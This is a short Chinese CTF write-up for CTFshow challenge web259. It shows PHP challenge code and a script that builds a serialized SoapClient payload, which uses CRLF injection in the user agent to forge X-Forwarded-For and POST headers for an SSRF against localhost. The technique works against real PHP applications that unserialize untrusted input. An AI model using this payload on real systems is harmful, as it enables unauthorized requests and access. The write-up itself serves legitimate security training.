CTFshow-WEB入门-反序列化web259

题目代码

flag.php

<?php
$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff);

if($ip!=='127.0.0.1'){
    die('error');
}else{
    $token = $_POST['token'];
    if($token=='ctfshow'){
        file_put_contents('flag.txt',$flag);
    }
}

index.php

<?php
highlight_file(__FILE__);

$vip = unserialize($_GET['vip']);
//vip can get flag one key
$vip->getFlag();

序列化为对象后调用不存在的函数会调用__call

开启 soap 拓展时，可以利用原生类 SoapClient 的 __call 发起请求达到SSRF

phpstudy开启扩展：php.ini 将 extension=php_soap.dll 前的 ; 去掉

利用PHP脚本生成Payload：

 <?php
//通过UA进行注入，Content-Length:13后面多余的就无效了
$ua = "ua\r\nX-Forwarded-For: 127.0.0.1,127.0.0.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 13\r\n\r\ntoken=ctfshow";
$soap = new SoapClient(null,array('uri'=>'http://127.0.0.1/','location'=>'http://127.0.0.1/flag.php','user_agent'=>$ua));
echo urlencode(serialize($soap));